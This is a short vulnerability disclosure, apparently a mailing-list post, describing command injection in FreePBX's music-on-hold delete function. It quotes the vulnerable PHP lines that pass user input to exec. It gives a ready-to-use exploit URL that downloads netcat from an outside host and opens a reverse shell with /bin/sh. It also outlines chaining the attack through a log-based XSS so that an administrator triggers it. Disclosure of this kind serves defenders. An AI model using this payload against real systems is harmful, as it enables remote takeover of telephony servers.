I've found a code injection in the music-on-hold module at freePBX's portal. There are Inssuficient filters in the delete functions. Only " ' and ; are being filtered. Vulnerable Lines: 300: $rmcmd="rm -f \"".$path_to_dir."/". $del."\""; 301: exec($rmcmd); Example code: http:///admin/config.php?display=music&del=\`wget -q http://xenomuta.coolinc.info/nc -O /tmp/nc\`\`/tmp/nc myhost.mydomain.com 1234 -e /bin/sh\`&category=default You can inject this code without access to the portal into the /var/ log/asterisk/full this way... ./asteriskxss.php asterisk-server "" hoping that an administrator to view the logs from the portals.... using the documented XSS vulnerability posted here... http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/ 053882.html